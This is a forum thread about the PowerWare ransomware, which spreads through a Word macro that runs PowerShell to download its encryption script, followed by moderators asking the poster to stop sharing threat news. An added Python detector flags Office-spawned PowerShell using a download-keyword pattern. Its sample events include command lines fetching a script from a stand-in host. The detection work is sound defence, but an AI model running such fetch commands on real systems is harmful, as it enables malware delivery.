New ransomware “PowerWare”


A newly discovered ransomware called ‘PowerWare’ uses a native Windows tool to encrypt files. The malware has been discovered by the security researchers from Carbon Black, who report ‘PowerWare’ uses Windows PowerShell to encrypt files.


Instead of infecting systems with a malicious .EXE file, this new ransomware uses a Word macro. Victims receive an email with a fake invoice that consists of a Word document. This document requires the user to allow macros to run in order to see its contents.

When the user enables the macro, the ransomware calls the Windows Command Prompt (cmd.exe) to start the PowerShell with options to download a script. This script contains the actual encryption routines.

read on in http://www.myce.com/news/new-ransomware-powerware-uses-native-windows-function-encrypt-files-78976/?utm_content=bufferefc7f&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer
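The chain summarized above (Word macro, then cmd.exe, then PowerShell fetching a script) is visible in process-creation telemetry. The following is an added example, not part of the original post or the linked article: it walks parent/child links and flags PowerShell running under an Office ancestor. The event fields, sample events and indicator list are constructed assumptions.

```python
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Assumed indicator list: common PowerShell download primitives.
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer", re.I)

# Constructed process-creation events (Sysmon Event ID 1 style); not real telemetry.
EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmd": "WINWORD.EXE /n invoice.docm"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c powershell.exe Invoke-WebRequest -Uri http://example.invalid/s.ps1"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Invoke-WebRequest -Uri http://example.invalid/s.ps1"},
    # Admin downloading from an interactive shell: no Office ancestor, not flagged.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Invoke-WebRequest -Uri http://example.invalid/tool.zip"},
    {"pid": 201, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\EXCEL.EXE", "cmd": "EXCEL.EXE"},
    {"pid": 600, "ppid": 201, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -Command Get-Date"},
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def ancestors(event, by_pid):
    """Yield parent, grandparent, ...; stops on a missing parent or a pid loop."""
    seen = {event["pid"]}
    cur = by_pid.get(event["ppid"])
    while cur and cur["pid"] not in seen:
        seen.add(cur["pid"])
        yield cur
        cur = by_pid.get(cur["ppid"])

def detect(events):
    by_pid = {e["pid"]: e for e in events}  # assumes pids are unique within the window
    alerts = []
    for e in events:
        if basename(e["image"]) not in SHELLS:
            continue
        chain = [basename(a["image"]) for a in ancestors(e, by_pid)]
        office = next((n for n in chain if n in OFFICE), None)
        if office is None:
            continue
        alerts.append({"pid": e["pid"], "office": office,
                       "via_cmd": "cmd.exe" in chain[:chain.index(office)],
                       "severity": "high" if DOWNLOAD.search(e["cmd"]) else "medium"})
    return alerts
```

Real telemetry reuses PIDs, so a production rule should key on a per-process GUID rather than the bare PID.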

Yepper.  I have submitted other scripted process encryption trojans.  Any process can be set up to use the Microsoft CryptoAPI.

sman  is paranoid because "they" are out to get him.  They being the Organization for the Organized.





Jokes apart, the forum has a section for 'new threats signatures' targeted by MBAM, but 'GC' is the only section to post news on latest threats, and as such kept posted, whenever any article of interest is found.. Now, by posting this, I'm no different from the author of the article/source website, who are giving attention to it..

Even the so-called, IT people/organizations, in the field, have been 'victims' of 'Cybercrime', so it's better to stay informed..


35 minutes ago, sman said:

Jokes apart,

The thing is, we are not joking. We are trying to communicate a serious, sincere message.

As has been repeatedly mentioned online and offline, by forum staff and forum volunteers, directly and indirectly, there is a line between being "informed" and being paranoid.
You have often mentioned your "high-stakes" online trading and other high-exposure activities on the internet.
And many members far more expert than I have advised you how to minimize that risk.
To eliminate the risk altogether, the only solution is to disconnect entirely from the internet. Period.

Most security-savvy users here already keep track of this stuff in other ways (and/or are already information overloaded).
Those forum members and Malwarebytes customers who are not security conscious to begin with likely are not stopping in several times a day to the Malwarebytes support forum to find out about hacked hospital medical records, Linux malware and other tangential topics, or even the latest ransomware flavor of the day.

Yes, you are certainly free to post every day with links to internet stories that interest you, if you have the time, interest and energy to do so.
At this point, however, it's become a bit "too much" FUD for many of us.

<EOD for me>

I don't think anyone's asking you to give up on your security and news, but to tone it down a bit and stop spamming the General Chat with IT Security-related news. If you are to post an article about every Ransomware that is discovered, you're in (and we are as well) for a very, very long ride. This forum is mainly a support platform for Malwarebytes and its customers, led by employees and volunteers who try to assist others, not a general IT Security discussion forum (even though conversations about this can happen sometimes).

Honestly, there are other forums that wouldn't mind you posting articles about every new threat that emerges, and even encourage such discussions around them. I suggest you take a look at these and post your articles there. Wilders Security is one (you have the same level of "security concern" as the users there).

Most of the articles you post are too complex for the normal user to understand or the people who actually understand the topic discussed (such as experts here), don't have the time to discuss the content of the article and/or don't see the need to do it here. Like dd said, users have their own source of information when it comes to news, and therefore, it isn't needed to use these forums as one to inform them.

  • Root Admin
5 hours ago, sman said:

Even the so-called, IT people/organizations, in the field, have been 'victims' of 'Cybercrime', so it's better to stay informed..


Anyone with true Expert level status that personally gets hit by one of these better turn in their club card. Organizations yes because even though an Expert may know what should be done often their hands are tied by what Management will allow.

As for staying informed there are now hundreds of news sites, blogs, and feeds that it's information overload for most people and those sites do a much better job than a few posts here do. Users that share similar concerns as you certainly already follow many security sites.

Yes, please check out the Wilders Security Forums - they love that type of information and discussion as that is what their forum is built around.

Seriously, an afterthought.. (Today the Bullion market had a sharp fall and was in the midst of that, so obviously missed out finer points on the post) ..

Think of 'Malware' and MB immediately comes to mind, so 'synonymous' with.. And with the modern era now about 'malware'. MB's role needs no emphasis.. Agreed, MB doesn't target all, areas targeted would certainly be of interest..

Take the 'cryptography' aspect. MB's blog post on that certainly points to its interest in it and so is my post on that for views.

Then this post, on 'Ransomware' when a MBARW is in development, in line for views/protection cover for this threat too..

These are specific areas of interest of MB and is it not proper to look for views on? TIA..

  • Root Admin

I'm sorry but this is not a Training Facility and has rules to prevent public discussion as it leads to much more misinformation than valid good information which then leads to users obtaining the wrong information and possibly causing more problems with their computer. The vast majority of public news is actually only skimming the surface on how, when, why most infections work. The majority of in-depth information is discussed and analyzed in private forums, emails, chats, physical meetings, private industry, etc. Not all but a lot of the NEWS is skimming the surface. Some public sites do go into great depth of detail but not most as they don't know and they're simply jumping on the bandwagon reposting the same old news.

Bottom line is that yes there are others that share the same fears you do and want to live in that fear. That is not something that I think should be shared as it's propaganda at that level. We share and so do other security sites that prevention and backups are the real key here regardless of what infection is here today or tomorrow. Regurgitating the same news that 100's of sites are posting is not really helping anyone here. There are typically three types of people here on our forums. Those that are already infected and looking for help, not news about how to prevent or how infections work. Those that are Helpers/Experts, etc that try to guide users to the right location and proper means and method to get their computer cleaned. Those that Administer and manage the forum. There are other visitors here for other reasons but their numbers are very small. Page views on NEWS of xyz infections are very low (again most users that are concerned about that have already typically read about them) We used to run a dedicated forum about such alerts but the time and trouble to maintain vs the page views just was not worth it. Often some pages that took hours to post and verify information would end up with less than a dozen views. So as others have said and we're all trying to be nice here is to tell you that such information posted daily or often is not really wanted or needed. Most users do not appear to share the same fear that you appear to even though we've provided many references as to why and how to not have to be afraid of said threats.

Now if you're posting for real discussion about infection xyz again please visit Wilders Security Forums as that is their bread and butter discussions and it will keep you very busy reading and posting to them. Here our main goal is cleanup and prevention. For training there are sites that do train home users on how to find, and safely remove infections.

If you're interested in helping others with removal of Malware please visit one of the sites below to sign up for a training school.

The following are websites who host training facilities: United Network of Instructors and Trained Eliminators


Thank you again


